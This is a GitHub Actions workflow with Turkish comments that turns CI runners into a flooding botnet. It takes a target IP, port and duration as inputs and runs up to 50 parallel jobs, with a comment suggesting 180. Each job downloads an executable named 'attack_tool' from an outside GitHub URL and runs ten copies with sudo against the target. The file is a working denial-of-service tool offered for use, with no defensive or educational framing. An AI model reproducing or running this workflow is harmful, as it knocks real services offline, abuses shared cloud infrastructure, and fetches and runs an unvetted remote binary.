name: Attack-Node-${{ github.repository_id }} # Her repoda isim farklılaşsın

on:
  workflow_dispatch:
    inputs:
      ip:
        description: "Target IP"
        required: true
      port:
        description: "Target Port"
        required: true
      time:
        description: 'Sure (Saniye)'
        required: true

# BU KISIM KRİTİK: Repoların birbirini beklemesini engeller
concurrency:
  group: ${{ github.workflow }}-${{ github.run_id }}
  cancel-in-progress: false

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false # Bir makine hata verirse diğerlerini durdurma!
      max-parallel: 180
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50] # Test için 50 yap, açılırsa 180'e çek

    steps:
      - name: Prep
        run: |
          wget https://github.com/urkwjrwmbewn/hoplatici.pl/raw/refs/heads/main/5 -O attack_tool
          chmod +x attack_tool
          
      - name: Turbo Fire
        run: |
          # Inputları çek
          IP="${{ github.event.inputs.ip }}"
          PORT="${{ github.event.inputs.port }}"
          TIME_VAL="${{ github.event.inputs.time }}"
          
          # Her makinede 10 paralel işlem başlat (Sömürüyü artır)
          for i in {1..10}; do
            sudo timeout "$TIME_VAL" ./attack_tool "$IP" "$PORT" 500 1000 99999 "$TIME_VAL" > /dev/null 2>&1 &
          done
          
          # timeout komutu arka planda çalıştığı için makineyi uyutarak açık tutuyoruz
          sleep "$TIME_VAL"
          echo "Baskın tamamlandı."
